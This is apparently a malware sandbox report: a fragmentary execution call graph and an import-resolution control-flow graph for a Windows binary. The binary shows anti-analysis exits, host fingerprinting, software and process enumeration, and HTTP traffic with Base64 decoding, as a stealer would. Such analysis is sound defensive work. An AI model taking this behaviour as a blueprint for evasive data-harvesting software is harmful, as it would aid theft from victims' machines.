13459 845c0 2 API calls 13458->13459 13460 823d2 13459->13460 13461 845c0 2 API calls 13460->13461 13462 823eb 13461->13462 13463 845c0 2 API calls 13462->13463 13464 82404 13463->13464 13465 845c0 2 API calls 13464->13465 13466 8241d 13465->13466 13467 845c0 2 API calls 13466->13467 13468 82436 13467->13468 13469 845c0 2 API calls 13468->13469 13470 8244f 13469->13470 13471 845c0 2 API calls 13470->13471 13472 82468 13471->13472 13473 845c0 2 API calls 13472->13473 13474 82481 13473->13474 13475 845c0 2 API 
calls 13474->13475 13476 8249a 13475->13476 13477 845c0 2 API calls 13476->13477 13478 824b3 13477->13478 13479 845c0 2 API calls 13478->13479 13480 824cc 13479->13480 13481 845c0 2 API calls 13480->13481 13482 824e5 13481->13482 13483 845c0 2 API calls 13482->13483 13484 824fe 13483->13484 13485 845c0 2 API calls 13484->13485 13486 82517 13485->13486 13487 845c0 2 API calls 13486->13487 13488 82530 13487->13488 13489 845c0 2 API calls 13488->13489 13490 82549 13489->13490 13491 845c0 2 API calls 13490->13491 13492 82562 13491->13492 13493 845c0 2 API calls 13492->13493 13494 8257b 13493->13494 13495 845c0 2 API calls 13494->13495 13496 82594 13495->13496 13497 845c0 2 API calls 13496->13497 13498 825ad 13497->13498 13499 845c0 2 API calls 13498->13499 13500 825c6 13499->13500 13501 845c0 2 API calls 13500->13501 13502 825df 13501->13502 13503 845c0 2 API calls 13502->13503 13504 825f8 13503->13504 13505 845c0 2 API calls 13504->13505 13506 82611 13505->13506 13507 845c0 2 API calls 13506->13507 13508 8262a 13507->13508 13509 845c0 2 API calls 13508->13509 13510 82643 13509->13510 13511 845c0 2 API calls 13510->13511 13512 8265c 13511->13512 13513 845c0 2 API calls 13512->13513 13514 82675 13513->13514 13515 845c0 2 API calls 13514->13515 13516 8268e 13515->13516 13517 99860 13516->13517 13788 99750 GetPEB 13517->13788 13519 99868 13520 9987a 13519->13520 13521 99a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13519->13521 13526 9988c 21 API calls 13520->13526 13522 99b0d 13521->13522 13523 99af4 GetProcAddress 13521->13523 13524 99b46 13522->13524 13525 99b16 GetProcAddress GetProcAddress 13522->13525 13523->13522 13527 99b68 13524->13527 13528 99b4f GetProcAddress 13524->13528 13525->13524 13526->13521 13529 99b89 13527->13529 13530 99b71 GetProcAddress 13527->13530 13528->13527 13531 96a00 13529->13531 13532 99b92 GetProcAddress GetProcAddress 13529->13532 13530->13529 13533 9a740 13531->13533 13532->13531 13534 9a750 13533->13534 13535 
[Execution graph listing (fragment of the interactive call-graph rendering; node/edge text only survived extraction). Nodes are labelled with a code address and the Win32 APIs called there; edges give the successor relation.]
APIs named in this fragment: ExitProcess, GetSystemInfo, GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, VirtualProtect, GlobalMemoryStatusEx, GetUserDefaultLangID, GetProcessHeap, RtlAllocateHeap, GetUserNameA, GetComputerNameA, GetWindowsDirectoryA, GetVolumeInformationA, IsWow64Process, GetProcAddress, lstrcpy, lstrcat, lstrlen, sscanf, wsprintfA, SystemTimeToFileTime, StrCmpCA, Sleep, CryptStringToBinaryA, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle.
Structure recoverable from the listing: the functions at 81160 (GetSystemInfo), 81110 (GetCurrentProcess, VirtualAllocExNuma) and 81220 (GlobalMemoryStatusEx via 989b0) each have an ExitProcess successor; the function at 96770 calls GetUserDefaultLangID and its node 96792 branches to five separate ExitProcess nodes; 97850 and 978e0 call GetUserNameA and GetComputerNameA, 97500 calls GetWindowsDirectoryA, GetVolumeInformationA and wsprintfA, and 977c0 calls IsWow64Process; the function at 845c0 (RtlAllocateHeap, VirtualProtect) is invoked from a long chain of nodes in the 826a0..845a9 range, after which 99c10 and its successors resolve imports through repeated GetProcAddress calls; the functions at 84880 and 85960 each perform an HTTP exchange (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle) followed by CryptStringToBinaryA at 89ac0; 917a0 performs a series of StrCmpCA comparisons with an ExitProcess branch at 917cf, and 95510 loops over StrCmpCA comparisons with a Sleep at 95a16.
14990->14991 14992 9a9b0 4 API calls 14991->14992 14993 91d4c 14992->14993 14994 9a8a0 lstrcpy 14993->14994 14995 91d55 14994->14995 14996 9a9b0 4 API calls 14995->14996 14997 91d75 14996->14997 14998 9a8a0 lstrcpy 14997->14998 14999 91d7e 14998->14999 15000 978e0 3 API calls 14999->15000 15001 91d8e 15000->15001 15002 9a9b0 4 API calls 15001->15002 15003 91d9e 15002->15003 15004 9a8a0 lstrcpy 15003->15004 15005 91da7 15004->15005 15006 9a9b0 4 API calls 15005->15006 15007 91dc6 15006->15007 15008 9a8a0 lstrcpy 15007->15008 15009 91dcf 15008->15009 15010 9a9b0 4 API calls 15009->15010 15011 91df0 15010->15011 15012 9a8a0 lstrcpy 15011->15012 15013 91df9 15012->15013 15672 97980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15013->15672 15016 9a9b0 4 API calls 15017 91e19 15016->15017 15018 9a8a0 lstrcpy 15017->15018 15019 91e22 15018->15019 15020 9a9b0 4 API calls 15019->15020 15021 91e41 15020->15021 15022 9a8a0 lstrcpy 15021->15022 15023 91e4a 15022->15023 15024 9a9b0 4 API calls 15023->15024 15025 91e6b 15024->15025 15026 9a8a0 lstrcpy 15025->15026 15027 91e74 15026->15027 15674 97a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15027->15674 15030 9a9b0 4 API calls 15031 91e94 15030->15031 15032 9a8a0 lstrcpy 15031->15032 15033 91e9d 15032->15033 15034 9a9b0 4 API calls 15033->15034 15035 91ebc 15034->15035 15036 9a8a0 lstrcpy 15035->15036 15037 91ec5 15036->15037 15038 9a9b0 4 API calls 15037->15038 15039 91ee5 15038->15039 15040 9a8a0 lstrcpy 15039->15040 15041 91eee 15040->15041 15677 97b00 GetUserDefaultLocaleName 15041->15677 15044 9a9b0 4 API calls 15045 91f0e 15044->15045 15046 9a8a0 lstrcpy 15045->15046 15047 91f17 15046->15047 15048 9a9b0 4 API calls 15047->15048 15049 91f36 15048->15049 15050 9a8a0 lstrcpy 15049->15050 15051 91f3f 15050->15051 15052 9a9b0 4 API calls 15051->15052 15053 91f60 15052->15053 15054 9a8a0 lstrcpy 15053->15054 15055 91f69 15054->15055 15681 97b90 15055->15681 15057 91f80 15058 9a920 3 API calls 15057->15058 
15059 91f93 15058->15059 15060 9a8a0 lstrcpy 15059->15060 15061 91f9c 15060->15061 15062 9a9b0 4 API calls 15061->15062 15063 91fc6 15062->15063 15064 9a8a0 lstrcpy 15063->15064 15065 91fcf 15064->15065 15066 9a9b0 4 API calls 15065->15066 15067 91fef 15066->15067 15068 9a8a0 lstrcpy 15067->15068 15069 91ff8 15068->15069 15693 97d80 GetSystemPowerStatus 15069->15693 15072 9a9b0 4 API calls 15073 92018 15072->15073 15074 9a8a0 lstrcpy 15073->15074 15075 92021 15074->15075 15076 9a9b0 4 API calls 15075->15076 15077 92040 15076->15077 15078 9a8a0 lstrcpy 15077->15078 15079 92049 15078->15079 15080 9a9b0 4 API calls 15079->15080 15081 9206a 15080->15081 15082 9a8a0 lstrcpy 15081->15082 15083 92073 15082->15083 15084 9207e GetCurrentProcessId 15083->15084 15695 99470 OpenProcess 15084->15695 15087 9a920 3 API calls 15088 920a4 15087->15088 15089 9a8a0 lstrcpy 15088->15089 15090 920ad 15089->15090 15091 9a9b0 4 API calls 15090->15091 15092 920d7 15091->15092 15093 9a8a0 lstrcpy 15092->15093 15094 920e0 15093->15094 15095 9a9b0 4 API calls 15094->15095 15096 92100 15095->15096 15097 9a8a0 lstrcpy 15096->15097 15098 92109 15097->15098 15700 97e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15098->15700 15101 9a9b0 4 API calls 15102 92129 15101->15102 15103 9a8a0 lstrcpy 15102->15103 15104 92132 15103->15104 15105 9a9b0 4 API calls 15104->15105 15106 92151 15105->15106 15107 9a8a0 lstrcpy 15106->15107 15108 9215a 15107->15108 15109 9a9b0 4 API calls 15108->15109 15110 9217b 15109->15110 15111 9a8a0 lstrcpy 15110->15111 15112 92184 15111->15112 15704 97f60 15112->15704 15115 9a9b0 4 API calls 15116 921a4 15115->15116 15117 9a8a0 lstrcpy 15116->15117 15118 921ad 15117->15118 15119 9a9b0 4 API calls 15118->15119 15120 921cc 15119->15120 15121 9a8a0 lstrcpy 15120->15121 15122 921d5 15121->15122 15123 9a9b0 4 API calls 15122->15123 15124 921f6 15123->15124 15125 9a8a0 lstrcpy 15124->15125 15126 921ff 15125->15126 15717 97ed0 GetSystemInfo wsprintfA 15126->15717 15129 9a9b0 4 
API calls 15130 9221f 15129->15130 15131 9a8a0 lstrcpy 15130->15131 15132 92228 15131->15132 15133 9a9b0 4 API calls 15132->15133 15134 92247 15133->15134 15135 9a8a0 lstrcpy 15134->15135 15136 92250 15135->15136 15137 9a9b0 4 API calls 15136->15137 15138 92270 15137->15138 15139 9a8a0 lstrcpy 15138->15139 15140 92279 15139->15140 15719 98100 GetProcessHeap RtlAllocateHeap 15140->15719 15143 9a9b0 4 API calls 15144 92299 15143->15144 15145 9a8a0 lstrcpy 15144->15145 15146 922a2 15145->15146 15147 9a9b0 4 API calls 15146->15147 15148 922c1 15147->15148 15149 9a8a0 lstrcpy 15148->15149 15150 922ca 15149->15150 15151 9a9b0 4 API calls 15150->15151 15152 922eb 15151->15152 15153 9a8a0 lstrcpy 15152->15153 15154 922f4 15153->15154 15725 987c0 15154->15725 15157 9a920 3 API calls 15158 9231e 15157->15158 15159 9a8a0 lstrcpy 15158->15159 15160 92327 15159->15160 15161 9a9b0 4 API calls 15160->15161 15162 92351 15161->15162 15163 9a8a0 lstrcpy 15162->15163 15164 9235a 15163->15164 15165 9a9b0 4 API calls 15164->15165 15166 9237a 15165->15166 15167 9a8a0 lstrcpy 15166->15167 15168 92383 15167->15168 15169 9a9b0 4 API calls 15168->15169 15170 923a2 15169->15170 15171 9a8a0 lstrcpy 15170->15171 15172 923ab 15171->15172 15730 981f0 15172->15730 15174 923c2 15175 9a920 3 API calls 15174->15175 15176 923d5 15175->15176 15177 9a8a0 lstrcpy 15176->15177 15178 923de 15177->15178 15179 9a9b0 4 API calls 15178->15179 15180 9240a 15179->15180 15181 9a8a0 lstrcpy 15180->15181 15182 92413 15181->15182 15183 9a9b0 4 API calls 15182->15183 15184 92432 15183->15184 15185 9a8a0 lstrcpy 15184->15185 15186 9243b 15185->15186 15187 9a9b0 4 API calls 15186->15187 15188 9245c 15187->15188 15189 9a8a0 lstrcpy 15188->15189 15190 92465 15189->15190 15191 9a9b0 4 API calls 15190->15191 15192 92484 15191->15192 15193 9a8a0 lstrcpy 15192->15193 15194 9248d 15193->15194 15195 9a9b0 4 API calls 15194->15195 15196 924ae 15195->15196 15197 9a8a0 lstrcpy 15196->15197 15198 924b7 15197->15198 15738 98320 
15198->15738 15200 924d3 15201 9a920 3 API calls 15200->15201 15202 924e6 15201->15202 15203 9a8a0 lstrcpy 15202->15203 15204 924ef 15203->15204 15205 9a9b0 4 API calls 15204->15205 15206 92519 15205->15206 15207 9a8a0 lstrcpy 15206->15207 15208 92522 15207->15208 15209 9a9b0 4 API calls 15208->15209 15210 92543 15209->15210 15211 9a8a0 lstrcpy 15210->15211 15212 9254c 15211->15212 15213 98320 17 API calls 15212->15213 15214 92568 15213->15214 15215 9a920 3 API calls 15214->15215 15216 9257b 15215->15216 15217 9a8a0 lstrcpy 15216->15217 15218 92584 15217->15218 15219 9a9b0 4 API calls 15218->15219 15220 925ae 15219->15220 15221 9a8a0 lstrcpy 15220->15221 15222 925b7 15221->15222 15223 9a9b0 4 API calls 15222->15223 15224 925d6 15223->15224 15225 9a8a0 lstrcpy 15224->15225 15226 925df 15225->15226 15227 9a9b0 4 API calls 15226->15227 15228 92600 15227->15228 15229 9a8a0 lstrcpy 15228->15229 15230 92609 15229->15230 15774 98680 15230->15774 15232 92620 15233 9a920 3 API calls 15232->15233 15234 92633 15233->15234 15235 9a8a0 lstrcpy 15234->15235 15236 9263c 15235->15236 15237 9265a lstrlen 15236->15237 15238 9266a 15237->15238 15239 9a740 lstrcpy 15238->15239 15240 9267c 15239->15240 15241 81590 lstrcpy 15240->15241 15242 9268d 15241->15242 15784 95190 15242->15784 15244 92699 15244->13676 15972 9aad0 15245->15972 15247 85009 InternetOpenUrlA 15251 85021 15247->15251 15248 8502a InternetReadFile 15248->15251 15249 850a0 InternetCloseHandle InternetCloseHandle 15250 850ec 15249->15250 15250->13680 15251->15248 15251->15249 15973 898d0 15252->15973 15254 90759 15255 90a38 15254->15255 15256 9077d 15254->15256 15257 81590 lstrcpy 15255->15257 15259 90799 StrCmpCA 15256->15259 15258 90a49 15257->15258 16149 90250 15258->16149 15261 90843 15259->15261 15262 907a8 15259->15262 15265 90865 StrCmpCA 15261->15265 15264 9a7a0 lstrcpy 15262->15264 15266 907c3 15264->15266 15267 90874 15265->15267 15304 9096b 15265->15304 15268 81590 lstrcpy 15266->15268 15269 9a740 lstrcpy 
15267->15269 15270 9080c 15268->15270 15272 90881 15269->15272 15273 9a7a0 lstrcpy 15270->15273 15271 9099c StrCmpCA 15274 909ab 15271->15274 15275 90a2d 15271->15275 15276 9a9b0 4 API calls 15272->15276 15277 90823 15273->15277 15278 81590 lstrcpy 15274->15278 15275->13684 15279 908ac 15276->15279 15280 9a7a0 lstrcpy 15277->15280 15281 909f4 15278->15281 15282 9a920 3 API calls 15279->15282 15283 9083e 15280->15283 15284 9a7a0 lstrcpy 15281->15284 15285 908b3 15282->15285 15976 8fb00 15283->15976 15287 90a0d 15284->15287 15288 9a9b0 4 API calls 15285->15288 15289 9a7a0 lstrcpy 15287->15289 15290 908ba 15288->15290 15291 90a28 15289->15291 15292 9a8a0 lstrcpy 15290->15292 15304->15271 15624 9a7a0 lstrcpy 15623->15624 15625 81683 15624->15625 15626 9a7a0 lstrcpy 15625->15626 15627 81695 15626->15627 15628 9a7a0 lstrcpy 15627->15628 15629 816a7 15628->15629 15630 9a7a0 lstrcpy 15629->15630 15631 815a3 15630->15631 15631->14507 15633 847c6 15632->15633 15634 84838 lstrlen 15633->15634 15658 9aad0 15634->15658 15636 84848 InternetCrackUrlA 15637 84867 15636->15637 15637->14584 15639 9a740 lstrcpy 15638->15639 15640 98b74 15639->15640 15641 9a740 lstrcpy 15640->15641 15642 98b82 GetSystemTime 15641->15642 15643 98b99 15642->15643 15644 9a7a0 lstrcpy 15643->15644 15645 98bfc 15644->15645 15645->14599 15647 9a931 15646->15647 15648 9a988 15647->15648 15650 9a968 lstrcpy lstrcat 15647->15650 15649 9a7a0 lstrcpy 15648->15649 15651 9a994 15649->15651 15650->15648 15651->14602 15652->14717 15654 89af9 LocalAlloc 15653->15654 15655 84eee 15653->15655 15654->15655 15656 89b14 CryptStringToBinaryA 15654->15656 15655->14605 15655->14608 15656->15655 15657 89b39 LocalFree 15656->15657 15657->15655 15658->15636 15659->14727 15660->14868 15661->14870 15662->14878 15791 977a0 15663->15791 15666 976c6 RegOpenKeyExA 15668 97704 RegCloseKey 15666->15668 15669 976e7 RegQueryValueExA 15666->15669 15667 91c1e 15667->14960 15668->15667 15669->15668 15671 91c99 15670->15671 15671->14974 
15673 91e09 15672->15673 15673->15016 15675 97a9a wsprintfA 15674->15675 15676 91e84 15674->15676 15675->15676 15676->15030 15678 97b4d 15677->15678 15679 91efe 15677->15679 15798 98d20 LocalAlloc CharToOemW 15678->15798 15679->15044 15682 9a740 lstrcpy 15681->15682 15683 97bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15682->15683 15692 97c25 15683->15692 15684 97d18 15686 97d28 15684->15686 15687 97d1e LocalFree 15684->15687 15685 97c46 GetLocaleInfoA 15685->15692 15688 9a7a0 lstrcpy 15686->15688 15687->15686 15691 97d37 15688->15691 15689 9a8a0 lstrcpy 15689->15692 15690 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15690->15692 15691->15057 15692->15684 15692->15685 15692->15689 15692->15690 15694 92008 15693->15694 15694->15072 15696 99493 GetModuleFileNameExA CloseHandle 15695->15696 15697 994b5 15695->15697 15696->15697 15698 9a740 lstrcpy 15697->15698 15699 92091 15698->15699 15699->15087 15701 97e68 RegQueryValueExA 15700->15701 15702 92119 15700->15702 15703 97e8e RegCloseKey 15701->15703 15702->15101 15703->15702 15705 97fb9 GetLogicalProcessorInformationEx 15704->15705 15706 97fd8 GetLastError 15705->15706 15708 98029 15705->15708 15707 98022 15706->15707 15716 97fe3 15706->15716 15711 92194 15707->15711 15713 989f0 2 API calls 15707->15713 15712 989f0 2 API calls 15708->15712 15711->15115 15714 9807b 15712->15714 15713->15711 15714->15707 15715 98084 wsprintfA 15714->15715 15715->15711 15716->15705 15716->15711 15799 989f0 15716->15799 15802 98a10 GetProcessHeap RtlAllocateHeap 15716->15802 15718 9220f 15717->15718 15718->15129 15720 989b0 15719->15720 15721 9814d GlobalMemoryStatusEx 15720->15721 15722 98163 __aulldiv 15721->15722 15723 9819b wsprintfA 15722->15723 15724 92289 15723->15724 15724->15143 15726 987fb GetProcessHeap RtlAllocateHeap wsprintfA 15725->15726 15728 9a740 lstrcpy 15726->15728 15729 9230b 15728->15729 15729->15157 15731 9a740 lstrcpy 15730->15731 15733 98229 15731->15733 15732 98263 15734 9a7a0 lstrcpy 15732->15734 
15733->15732 15735 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15733->15735 15737 9a8a0 lstrcpy 15733->15737 15736 982dc 15734->15736 15735->15733 15736->15174 15737->15733 15739 9a740 lstrcpy 15738->15739 15740 9835c RegOpenKeyExA 15739->15740 15741 983ae 15740->15741 15742 983d0 15740->15742 15743 9a7a0 lstrcpy 15741->15743 15744 983f8 RegEnumKeyExA 15742->15744 15745 98613 RegCloseKey 15742->15745 15754 983bd 15743->15754 15746 9843f wsprintfA RegOpenKeyExA 15744->15746 15747 9860e 15744->15747 15748 9a7a0 lstrcpy 15745->15748 15749 984c1 RegQueryValueExA 15746->15749 15750 98485 RegCloseKey RegCloseKey 15746->15750 15747->15745 15748->15754 15752 984fa lstrlen 15749->15752 15753 98601 RegCloseKey 15749->15753 15751 9a7a0 lstrcpy 15750->15751 15751->15754 15752->15753 15755 98510 15752->15755 15753->15747 15754->15200 15756 9a9b0 4 API calls 15755->15756 15757 98527 15756->15757 15758 9a8a0 lstrcpy 15757->15758 15759 98533 15758->15759 15760 9a9b0 4 API calls 15759->15760 15761 98557 15760->15761 15762 9a8a0 lstrcpy 15761->15762 15763 98563 15762->15763 15764 9856e RegQueryValueExA 15763->15764 15764->15753 15765 985a3 15764->15765 15766 9a9b0 4 API calls 15765->15766 15767 985ba 15766->15767 15768 9a8a0 lstrcpy 15767->15768 15769 985c6 15768->15769 15770 9a9b0 4 API calls 15769->15770 15771 985ea 15770->15771 15772 9a8a0 lstrcpy 15771->15772 15773 985f6 15772->15773 15773->15753 15775 9a740 lstrcpy 15774->15775 15776 986bc CreateToolhelp32Snapshot Process32First 15775->15776 15777 986e8 Process32Next 15776->15777 15778 9875d CloseHandle 15776->15778 15777->15778 15783 986fd 15777->15783 15779 9a7a0 lstrcpy 15778->15779 15782 98776 15779->15782 15780 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15780->15783 15781 9a8a0 lstrcpy 15781->15783 15782->15232 15783->15777 15783->15780 15783->15781 15785 9a7a0 lstrcpy 15784->15785 15786 951b5 15785->15786 15787 81590 lstrcpy 15786->15787 15788 951c6 15787->15788 15803 85100 15788->15803 15790 951cf 15790->15244 15794 97720 
GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15791->15794 15793 976b9 15793->15666 15793->15667 15795 97780 RegCloseKey 15794->15795 15796 97765 RegQueryValueExA 15794->15796 15797 97793 15795->15797 15796->15795 15797->15793 15798->15679 15800 989f9 GetProcessHeap HeapFree 15799->15800 15801 98a0c 15799->15801 15800->15801 15801->15716 15802->15716 15804 9a7a0 lstrcpy 15803->15804 15805 85119 15804->15805 15806 847b0 2 API calls 15805->15806 15807 85125 15806->15807 15963 98ea0 15807->15963 15809 85184 15810 85192 lstrlen 15809->15810 15811 851a5 15810->15811 15812 98ea0 4 API calls 15811->15812 15813 851b6 15812->15813 15814 9a740 lstrcpy 15813->15814 15815 851c9 15814->15815 15816 9a740 lstrcpy 15815->15816 15817 851d6 15816->15817 15818 9a740 lstrcpy 15817->15818 15819 851e3 15818->15819 15820 9a740 lstrcpy 15819->15820 15821 851f0 15820->15821 15822 9a740 lstrcpy 15821->15822 15823 851fd InternetOpenA StrCmpCA 15822->15823 15824 8522f 15823->15824 15825 858c4 InternetCloseHandle 15824->15825 15826 98b60 3 API calls 15824->15826 15830 858d9 codecvt 15825->15830 15827 8524e 15826->15827 15828 9a920 3 API calls 15827->15828 15829 85261 15828->15829 15831 9a8a0 lstrcpy 15829->15831 15836 9a7a0 lstrcpy 15830->15836 15832 8526a 15831->15832 15833 9a9b0 4 API calls 15832->15833 15834 852ab 15833->15834 15835 9a920 3 API calls 15834->15835 15837 852b2 15835->15837 15844 85913 15836->15844 15838 9a9b0 4 API calls 15837->15838 15839 852b9 15838->15839 15840 9a8a0 lstrcpy 15839->15840 15841 852c2 15840->15841 15842 9a9b0 4 API calls 15841->15842 15843 85303 15842->15843 15845 9a920 3 API calls 15843->15845 15844->15790 15846 8530a 15845->15846 15847 9a8a0 lstrcpy 15846->15847 15848 85313 15847->15848 15849 85329 InternetConnectA 15848->15849 15849->15825 15850 85359 HttpOpenRequestA 15849->15850 15852 858b7 InternetCloseHandle 15850->15852 15853 853b7 15850->15853 15852->15825 15854 9a9b0 4 API calls 15853->15854 15855 853cb 15854->15855 15856 9a8a0 lstrcpy 15855->15856 
15857 853d4 15856->15857 15858 9a920 3 API calls 15857->15858 15859 853f2 15858->15859 15860 9a8a0 lstrcpy 15859->15860 15861 853fb 15860->15861 15862 9a9b0 4 API calls 15861->15862 15863 8541a 15862->15863 15864 9a8a0 lstrcpy 15863->15864 15865 85423 15864->15865 15866 9a9b0 4 API calls 15865->15866 15867 85444 15866->15867 15868 9a8a0 lstrcpy 15867->15868 15869 8544d 15868->15869 15870 9a9b0 4 API calls 15869->15870 15871 8546e 15870->15871 15964 98ead CryptBinaryToStringA 15963->15964 15966 98ea9 15963->15966 15965 98ece GetProcessHeap RtlAllocateHeap 15964->15965 15964->15966 15965->15966 15967 98ef4 codecvt 15965->15967 15966->15809 15968 98f05 CryptBinaryToStringA 15967->15968 15968->15966 15972->15247 16215 89880 15973->16215 15975 898e1 15975->15254 15977 9a740 lstrcpy 15976->15977 15978 8fb16 15977->15978 16150 9a740 lstrcpy 16149->16150 16151 90266 16150->16151 16152 98de0 2 API calls 16151->16152 16153 9027b 16152->16153 16154 9a920 3 API calls 16153->16154 16155 9028b 16154->16155 16156 9a8a0 lstrcpy 16155->16156 16157 90294 16156->16157 16158 9a9b0 4 API calls 16157->16158 16216 8988e 16215->16216 16219 86fb0 16216->16219 16218 898ad codecvt 16218->15975 16222 86d40 16219->16222 16223 86d63 16222->16223 16236 86d59 16222->16236 16238 86530 16223->16238 16227 86dbe 16227->16236 16248 869b0 16227->16248 16229 86e2a 16230 86ee6 VirtualFree 16229->16230 16232 86ef7 16229->16232 16229->16236 16230->16232 16231 86f41 16235 989f0 2 API calls 16231->16235 16231->16236 16232->16231 16233 86f38 16232->16233 16234 86f26 FreeLibrary 16232->16234 16237 989f0 2 API calls 16233->16237 16234->16232 16235->16236 16236->16218 16237->16231 16239 86542 16238->16239 16241 86549 16239->16241 16258 98a10 GetProcessHeap RtlAllocateHeap 16239->16258 16241->16236 16242 86660 16241->16242 16245 8668f VirtualAlloc 16242->16245 16244 86730 16246 8673c 16244->16246 16247 86743 VirtualAlloc 16244->16247 16245->16244 16245->16246 16246->16227 16247->16246 16249 869c9 16248->16249 
16253 869d5 16248->16253 16250 86a09 LoadLibraryA 16249->16250 16249->16253 16251 86a32 16250->16251 16250->16253 16256 86ae0 16251->16256 16259 98a10 GetProcessHeap RtlAllocateHeap 16251->16259 16253->16229 16254 86ba8 GetProcAddress 16254->16253 16254->16256 16255 989f0 2 API calls 16255->16256 16256->16253 16256->16254 16257 86a8b 16257->16253 16257->16255 16258->16241 16259->16257

                                    Control-flow Graph

                                    control_flow_graph 660 99860-99874 call 99750 663 9987a-99a8e call 99780 GetProcAddress * 21 660->663 664 99a93-99af2 LoadLibraryA * 5 660->664 663->664 666 99b0d-99b14 664->666 667 99af4-99b08 GetProcAddress 664->667 668 99b46-99b4d 666->668 669 99b16-99b41 GetProcAddress * 2 666->669 667->666 671 99b68-99b6f 668->671 672 99b4f-99b63 GetProcAddress 668->672 669->668 673 99b89-99b90 671->673 674 99b71-99b84 GetProcAddress 671->674 672->671 675 99bc1-99bc2 673->675 676 99b92-99bbc GetProcAddress * 2 673->676 674->673 676->675
                                    APIs
                                    • GetProcAddress.KERNEL32(76210000,00D31668), ref: 000998A1
                                    • GetProcAddress.KERNEL32(76210000,00D317B8), ref: 000998BA
                                    • GetProcAddress.KERNEL32(76210000,00D31608), ref: 000998D2
                                    • GetProcAddress.KERNEL32(76210000,00D315C0), ref: 000998EA
                                    • GetProcAddress.KERNEL32(76210000,00D315F0), ref: 00099903
                                    • GetProcAddress.KERNEL32(76210000,00D38AD8), ref: 0009991B
                                    • GetProcAddress.KERNEL32(76210000,00D25128), ref: 00099933
                                    • GetProcAddress.KERNEL32(76210000,00D24F88), ref: 0009994C
                                    • GetProcAddress.KERNEL32(76210000,00D31518), ref: 00099964
                                    • GetProcAddress.KERNEL32(76210000,00D31638), ref: 0009997C
                                    • GetProcAddress.KERNEL32(76210000,00D31530), ref: 00099995
                                    • GetProcAddress.KERNEL32(76210000,00D31650), ref: 000999AD
                                    • GetProcAddress.KERNEL32(76210000,00D25048), ref: 000999C5
                                    • GetProcAddress.KERNEL32(76210000,00D316C8), ref: 000999DE
                                    • GetProcAddress.KERNEL32(76210000,00D31548), ref: 000999F6
                                    • GetProcAddress.KERNEL32(76210000,00D252C8), ref: 00099A0E
                                    • GetProcAddress.KERNEL32(76210000,00D31590), ref: 00099A27
                                    • GetProcAddress.KERNEL32(76210000,00D316E0), ref: 00099A3F
                                    • GetProcAddress.KERNEL32(76210000,00D25028), ref: 00099A57
                                    • GetProcAddress.KERNEL32(76210000,00D31878), ref: 00099A70
                                    • GetProcAddress.KERNEL32(76210000,00D25068), ref: 00099A88
                                    • LoadLibraryA.KERNEL32(00D31800,?,00096A00), ref: 00099A9A
                                    • LoadLibraryA.KERNEL32(00D317E8,?,00096A00), ref: 00099AAB
                                    • LoadLibraryA.KERNEL32(00D31818,?,00096A00), ref: 00099ABD
                                    • LoadLibraryA.KERNEL32(00D31860,?,00096A00), ref: 00099ACF
                                    • LoadLibraryA.KERNEL32(00D31830,?,00096A00), ref: 00099AE0
                                    • GetProcAddress.KERNEL32(75B30000,00D31848), ref: 00099B02
                                    • GetProcAddress.KERNEL32(751E0000,00D31890), ref: 00099B23
                                    • GetProcAddress.KERNEL32(751E0000,00D318A8), ref: 00099B3B
                                    • GetProcAddress.KERNEL32(76910000,00D38FE0), ref: 00099B5D
                                    • GetProcAddress.KERNEL32(75670000,00D25288), ref: 00099B7E
                                    • GetProcAddress.KERNEL32(77310000,00D38BD8), ref: 00099B9F
                                    • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00099BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00099BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 7baeb3013c8c4ad9874623f591cfdb7c2e4ba621dc22f3683db2fd1c92a4c573
                                    • Instruction ID: 4ae76afd93712e136087656b7b6dff623fc217f17b7484b65a9884ef56c8b408
